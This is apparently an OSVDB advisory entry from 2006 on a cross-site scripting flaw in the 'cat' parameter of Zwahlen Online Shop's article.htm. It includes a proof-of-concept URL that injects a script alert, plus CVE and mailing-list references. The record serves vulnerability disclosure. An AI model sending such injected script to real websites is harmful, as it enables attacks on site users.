Zwahlen Online Shop article.htm cat Variable XSS

2006-10-22T18:18:51
ID OSVDB:30007
Type osvdb
Reporter OSVDB
Modified 2006-10-22T18:18:51

Description

Manual Testing Notes

http://[target]/article.htm?cat=<script>alert("fix your bugs!")</script>

References:

Vendor URL: http://www.zwahlen-informatik.ch/ Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0370.html Mail List Post: http://attrition.org/pipermail/vim/2006-November/001120.html Mail List Post: http://attrition.org/pipermail/vim/2006-November/001106.html ISS X-Force ID: 29753 FrSIRT Advisory: ADV-2006-4160 CVE-2006-5512 Bugtraq ID: 20682